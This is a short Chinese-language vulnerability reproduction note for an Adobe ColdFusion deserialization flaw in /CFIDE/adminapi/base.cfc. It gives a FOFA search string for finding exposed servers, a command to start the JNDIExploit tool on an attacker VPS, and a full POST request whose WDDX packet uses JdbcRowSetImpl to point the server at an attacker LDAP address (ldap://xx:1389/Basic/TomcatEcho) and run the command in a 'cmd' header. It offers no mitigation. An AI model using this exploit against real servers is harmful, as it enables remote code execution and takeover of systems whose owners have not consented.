登录 白背景

Adobe ColdFusion base存在反序列化漏洞

一、漏洞简介

Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以实现代码执行,可导致服务器失陷,获取服务器权限。

二、影响版本

  • Adobe ColdFusion

三、资产测绘

  • fofaapp="Adobe-ColdFusion"
  • 特征

image.png

四、漏洞复现

JNDIExploit-1.4-SNAPSHOT.jar上传到VPS

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPSIP

JNDIExploit-1.4-SNAPSHOT.jar
image.png

POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cmd: id

argumentCollection=
<wddxPacket version='1.0'>
    <header/>
    <data>
        <struct type='xcom.sun.rowset.JdbcRowSetImplx'>
            <var name='dataSourceName'>
                <string>ldap://xx:1389/Basic/TomcatEcho</string>
            </var>
            <var name='autoCommit'>
                <boolean value='true'/>
            </var>
        </struct>
    </data>
</wddxPacket>

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/fgv33rttozokud2y